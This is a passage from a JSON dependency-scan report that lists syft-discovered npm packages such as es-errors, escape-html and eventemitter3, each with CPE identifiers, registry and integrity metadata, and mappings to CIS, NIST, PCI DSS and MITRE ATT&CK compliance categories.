"cpe:2.3:a:es-define-property:es_define_property:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_define_property:es-define-property:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_define_property:es_define_property:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es-define:es-define-property:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es-define:es_define_property:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_define:es-define-property:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_define:es_define_property:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es:es-define-property:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es:es_define_property:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/es-define-property@1.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ce987dda52f0c354", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: es-errors 1.3.0", "title": "es-errors 1.3.0", "description": "Package discovered: es-errors 1.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "524e10cb2d7467ea", "name": "es-errors", "version": "1.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:es-errors:es-errors:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es-errors:es_errors:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_errors:es-errors:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_errors:es_errors:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es:es-errors:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es:es_errors:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/es-errors@1.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8e3c7c80273d6fd7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: es-object-atoms 1.1.1", "title": "es-object-atoms 1.1.1", "description": "Package discovered: es-object-atoms 1.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fa7ef7424a021d69", "name": "es-object-atoms", "version": "1.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:es-object-atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es-object-atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_object_atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_object_atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es-object:es-object-atoms:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es-object:es_object_atoms:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_object:es-object-atoms:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_object:es_object_atoms:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es:es-object-atoms:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es:es_object_atoms:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/es-object-atoms@1.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", "dependencies": { "es-errors": "^1.3.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "cdf746578205af98", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: es-set-tostringtag 2.1.0", "title": "es-set-tostringtag 2.1.0", "description": "Package discovered: es-set-tostringtag 2.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8f498e19379b53ea", "name": "es-set-tostringtag", "version": "2.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:es-set-tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es-set-tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_set_tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_set_tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es-set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es-set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es_set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:es:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/es-set-tostringtag@2.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", "dependencies": { "es-errors": "^1.3.0", "get-intrinsic": "^1.2.6", "has-tostringtag": "^1.0.2", "hasown": "^2.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3d860225864c56d0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: escalade 3.2.0", "title": "escalade 3.2.0", "description": "Package discovered: escalade 3.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2a58ccd5fc44a7b2", "name": "escalade", "version": "3.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:escalade:escalade:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/escalade@3.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2f35769c64d37fb5", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: escape-html 1.0.3", "title": "escape-html 1.0.3", "description": "Package discovered: escape-html 1.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "94fc6050cdb348bc", "name": "escape-html", "version": "1.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:escape-html:escape-html:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:escape-html:escape_html:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:escape_html:escape-html:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:escape_html:escape_html:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:escape:escape-html:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:escape:escape_html:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/escape-html@1.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz", "integrity": "sha512-NiSupZ4OeuGwr68lGIeym/ksIZMJodUGOSCZ/FSnTxcrekbvqrgdUxlJOMpijaKZVjAJrWrGs/6Jy8OMuyj9ow==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b31fcb4e8c7ac0d8", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: etag 1.8.1", "title": "etag 1.8.1", "description": "Package discovered: etag 1.8.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4ddb33d9fc7b6ece", "name": "etag", "version": "1.8.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:etag:etag:1.8.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/etag@1.8.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/etag/-/etag-1.8.1.tgz", "integrity": "sha512-aIL5Fx7mawVa300al2BnEE4iNvo1qETxLrPI/o05L7z6go7fCw1J6EQmbK4FmJ2AS7kgVF/KEZWufBfdClMcPg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "643445c96492a454", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: event-target-shim 5.0.1", "title": "event-target-shim 5.0.1", "description": "Package discovered: event-target-shim 5.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "419bcd6d1f4e7103", "name": "event-target-shim", "version": "5.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:event-target-shim:event-target-shim:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:event-target-shim:event_target_shim:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:event_target_shim:event-target-shim:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:event_target_shim:event_target_shim:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:event-target:event-target-shim:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:event-target:event_target_shim:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:event_target:event-target-shim:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:event_target:event_target_shim:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:event:event-target-shim:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:event:event_target_shim:5.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/event-target-shim@5.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/event-target-shim/-/event-target-shim-5.0.1.tgz", "integrity": "sha512-i/2XbnSz/uxRCU6+NdVJgKWDTM427+MqYbkQzD321DuCQJUqOuJKIA0IM2+W2xtYHdKOmZ4dR6fExsd4SXL+WQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "df7be298e5b5835f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: eventemitter3 4.0.7", "title": "eventemitter3 4.0.7", "description": "Package discovered: eventemitter3 4.0.7", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2bf11b6ac833063c", "name": "eventemitter3", "version": "4.0.7", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:eventemitter3:eventemitter3:4.0.7:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/eventemitter3@4.0.7", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/eventemitter3/-/eventemitter3-4.0.7.tgz", "integrity": "sha512-8guHBZCwKnFhYdHr2ysuRWErTwhoN2X8XELRlrRwpmfeY2jjuUN4taQMsULKUVo1K4DvZl+0pgfyoysHxvmvEw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": 